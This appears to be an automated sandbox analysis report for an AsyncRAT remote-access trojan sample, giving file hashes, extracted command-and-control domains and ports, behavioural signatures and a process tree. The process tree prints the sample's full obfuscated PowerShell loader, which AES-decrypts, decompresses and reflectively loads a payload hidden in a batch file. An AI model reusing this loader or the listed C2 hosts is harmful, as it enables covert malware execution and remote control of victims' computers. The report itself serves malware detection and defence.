Overview

overview

10

Static

static

10

8712a416dc...26.exe

windows7-x64

10

8712a416dc...26.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    36s
  • max time network
    35s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    01-02-2023 20:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe

  • Size

    72KB

  • MD5

    8cb1d168cf75e754026203935dcfa023

  • SHA1

    ba18d6636f1c59a72fa8042cff7c1e8fdf69eecb

  • SHA256

    8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126

  • SHA512

    7254e3bc08701fb233d1b0c340fd6104b9fc4d36ab962f7ac541f0aee539fe3c9a7b3fa692968a977e68690ad183e77d2b5f962b1265983b4771773ff55c62ae

  • SSDEEP

    1536:/rGBmYaZyxKeBy3bCXS4ZeUSlACnztfx:/rGBmYaZyxZBy3bCHelAI9x

Score
10/10
asyncratdefaultrat

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

churchmon.ddns.net:6606

churchmon.ddns.net:7707

churchmon.ddns.net:8808

churchmon21.ddns.net:6606

churchmon21.ddns.net:7707

churchmon21.ddns.net:8808

churchmon22.ddns.net:6606

churchmon22.ddns.net:7707

churchmon22.ddns.net:8808
Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

    ratasyncrat
  • Async RAT payload 2 IoCs
    rat
  • Executes dropped EXE 1 IoCs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe
    "C:\Users\Admin\AppData\Local\Temp\8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1184
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\gefcmy.bat"' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:916
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\gefcmy.bat"'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1456
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\Users\Admin\AppData\Local\Temp\gefcmy.bat" "
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1100
          • C:\Users\Admin\AppData\Local\Temp\gefcmy.bat.exe
            "gefcmy.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $DlAMm = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\gefcmy.bat').Split([Environment]::NewLine);foreach ($gnxLA in $DlAMm) { if ($gnxLA.StartsWith(':: ')) { $EieGe = $gnxLA.Substring(3); break; }; };$CtMSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($EieGe);$CdbBY = New-Object System.Security.Cryptography.AesManaged;$CdbBY.Mode = [System.Security.Cryptography.CipherMode]::CBC;$CdbBY.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$CdbBY.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NEPcZ0sSGxev/0ytodeTKgGxdiSyFK6PvVJKMsPopm0=');$CdbBY.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x/ZAOJI37zOKAo+7A/xutg==');$bwBZg = $CdbBY.CreateDecryptor();$CtMSE = $bwBZg.TransformFinalBlock($CtMSE, 0, $CtMSE.Length);$bwBZg.Dispose();$CdbBY.Dispose();$OapWv = New-Object System.IO.MemoryStream(, $CtMSE);$Otndw = New-Object System.IO.MemoryStream;$HxJaj = New-Object System.IO.Compression.GZipStream($OapWv, [IO.Compression.CompressionMode]::Decompress);$HxJaj.CopyTo($Otndw);$HxJaj.Dispose();$OapWv.Dispose();$Otndw.Dispose();$CtMSE = $Otndw.ToArray();$HiNYF = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($CtMSE);$wpmOJ = $HiNYF.EntryPoint;$wpmOJ.Invoke($null, (, [string[]] ('')))
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:736
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp8838.tmp.bat""
      2⤵
      • Deletes itself
      • Suspicious use of WriteProcessMemory
      PID:532
      • C:\Windows\SysWOW64\timeout.exe
        timeout 2
        3⤵
        • Delays execution with timeout.exe
        PID:808

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\gefcmy.bat
    Filesize

    325KB

    MD5

    36438d908fc48e243fc04035eba3a6cd

    SHA1

    a552a88e74440a1137b3a3a14e4089a630dfb855

    SHA256

    80504bf8dd15434a9841595f3f9e405f8843dd53b292d8e30d9a15b53b51fa7a

    SHA512

    3cea5f310c94129fe89c1cebfada52b4d0ac1d4f4e7be4ea06872b90e969b2bec4e322a127f6c4b02a9223ad6a29b21f90c1d627f233f938ded51da3ff6fd611

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\gefcmy.bat.exe
    Filesize

    442KB

    MD5

    92f44e405db16ac55d97e3bfe3b132fa

    SHA1

    04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

    SHA256

    6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

    SHA512

    f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\tmp8838.tmp.bat
    Filesize

    216B

    MD5

    b114271fc8c4f0f20cc0cf6b5315bec7

    SHA1

    e83d81844f32e140a7de1f455fb3464551bfb27e

    SHA256

    7db48b1affca55499bcdecfc3597346246c7b1f04aa8e0b8ea23e2de541bf892

    SHA512

    9a3ab883bfd4be07c3bb19e89cbedd90ec7fe1820e7ded15d918397182ed18f9ee9c24a657f77bebe8f34d696a59391fe83c6d892f5e9e44a18d8bc5e0bcf8d9

    Download Submit
  • \Users\Admin\AppData\Local\Temp\gefcmy.bat.exe
    Filesize

    442KB

    MD5

    92f44e405db16ac55d97e3bfe3b132fa

    SHA1

    04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

    SHA256

    6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

    SHA512

    f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

    Download Submit
  • memory/532-58-0x0000000000000000-mapping.dmp
    Download
  • memory/736-68-0x0000000000000000-mapping.dmp
    Download
  • memory/736-71-0x0000000074400000-0x00000000749AB000-memory.dmp
    Filesize

    5.7MB

    Download
  • memory/736-72-0x0000000074400000-0x00000000749AB000-memory.dmp
    Filesize

    5.7MB

    Download
  • memory/808-61-0x0000000000000000-mapping.dmp
    Download
  • memory/916-57-0x0000000000000000-mapping.dmp
    Download
  • memory/1100-65-0x0000000000000000-mapping.dmp
    Download
  • memory/1184-54-0x00000000010B0000-0x00000000010C2000-memory.dmp
    Filesize

    72KB

    Download
  • memory/1184-56-0x0000000000590000-0x00000000005B2000-memory.dmp
    Filesize

    136KB

    Download
  • memory/1184-55-0x0000000075BE1000-0x0000000075BE3000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1456-59-0x0000000000000000-mapping.dmp
    Download
  • memory/1456-63-0x0000000073F30000-0x00000000744DB000-memory.dmp
    Filesize

    5.7MB

    Download
  • memory/1456-66-0x0000000073F30000-0x00000000744DB000-memory.dmp
    Filesize

    5.7MB

    Download